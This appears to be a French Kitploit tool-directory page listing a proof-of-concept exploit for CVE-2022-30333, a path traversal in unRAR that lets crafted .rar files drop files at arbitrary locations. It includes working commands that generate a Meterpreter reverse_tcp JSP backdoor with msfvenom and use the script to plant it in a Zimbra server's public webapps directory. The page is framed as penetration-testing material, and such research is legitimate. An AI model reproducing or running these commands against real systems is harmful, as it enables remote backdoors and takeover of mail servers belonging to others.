Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
unrar-cve-2022-30333-poc — Exploit de preuve de concept pour CVE-2022-30333, traversée de chemin dans unRAR, générant des fichiers .rar malveillants pour déployer des charges utiles à des emplacements arbitraires. S'intègre avec Metasploit et msfvenom pour les tests de pénétration. | Kitploit
Outils/GitHubGitHub/rbowes-r7/unrar-cve-2022-30333-poc
Frameworks d'ExploitationGénération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubrbowes-r7/unrar-cve-2022-30333-poc

unrar-cve-2022-30333-poc

Exploit de preuve de concept pour CVE-2022-30333, traversée de chemin dans unRAR, générant des fichiers .rar malveillants pour déployer des charges utiles à des emplacements arbitraires. S'intègre avec Metasploit et msfvenom pour les tests de pénétration.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
145il y a 4 ansPas encore vérifié

Une preuve de concept pour CVE-2022-30333 - une vulnérabilité de traversée de chemin dans unRAR versions antérieures à 6.11. J'ai créé ceci comme démonstration de l'exploit pour un article sur AttackerKB, et j'espère l'intégrer bientôt dans un module Metasploit !

En gros, vous fournissez une cible (incluant la traversée de chemin) et des données de fichier, et cet outil générera un .rar qui extraira ce fichier à cet emplacement. La longueur maximale du fichier est de 104 octets, et la longueur maximale du fichier est de 4096 octets. (Ce n'est pas intrinsèque à la vulnérabilité, c'est juste ce que j'ai choisi lorsque j'ai généré le fichier).

Par exemple, générez une porte dérobée avec msfvenom :

root@kitploit:~
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.146 -f jsp -o payload.jsp

Créez ensuite un fichier .rar, en plaçant le .jsp dans un endroit amusant :

root@kitploit:~
$ ruby ./cve-2022-30333.rb '../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp' ./payload.jsp > file.rar
Télécharger l’outil